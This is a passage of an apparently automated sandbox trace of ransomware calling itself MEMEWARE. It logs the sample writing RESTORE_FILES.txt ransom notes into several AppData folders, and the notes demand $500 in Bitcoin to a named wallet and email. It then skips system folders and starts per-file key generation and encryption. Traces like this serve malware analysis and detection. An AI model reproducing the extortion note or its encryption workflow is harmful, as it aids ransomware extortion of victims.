E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.835] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0089.836] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.836] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0089.836] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.836] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0089.836] CloseHandle (hObject=0x158) returned 1 [0089.838] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0089.838] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0089.838] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\RESTORE_FILES.txt") returned 126 [0089.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.838] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.838] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0089.839] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.839] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.839] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.839] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0089.839] CloseHandle (hObject=0x154) returned 1 [0089.839] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.839] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.840] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\RESTORE_FILES.txt") returned 114 [0089.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.840] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.840] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.841] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.841] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.841] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.841] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0089.841] CloseHandle (hObject=0x150) returned 1 [0089.841] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.841] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.841] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\RESTORE_FILES.txt") returned 106 [0089.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.842] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.842] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.843] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.843] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.843] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.843] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.843] CloseHandle (hObject=0x14c) returned 1 [0089.844] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.844] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.844] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\RESTORE_FILES.txt") returned 91 [0089.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.863] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.863] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.864] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.864] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.864] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.864] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.864] CloseHandle (hObject=0xd8) returned 1 [0089.864] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0089.865] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0089.865] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\RESTORE_FILES.txt") returned 78 [0089.865] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.865] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.865] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0089.866] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.866] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0089.866] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.866] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0089.867] CloseHandle (hObject=0xd4) returned 1 [0089.867] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.867] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0089.867] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0089.867] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0089.867] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0089.867] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0089.867] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 59 [0089.867] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0089.867] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0089.867] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\*") returned 61 [0089.867] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0089.867] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.867] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.867] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.867] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.867] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.867] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\.") returned 61 [0089.867] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.867] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0089.867] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0089.867] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0089.867] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0089.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 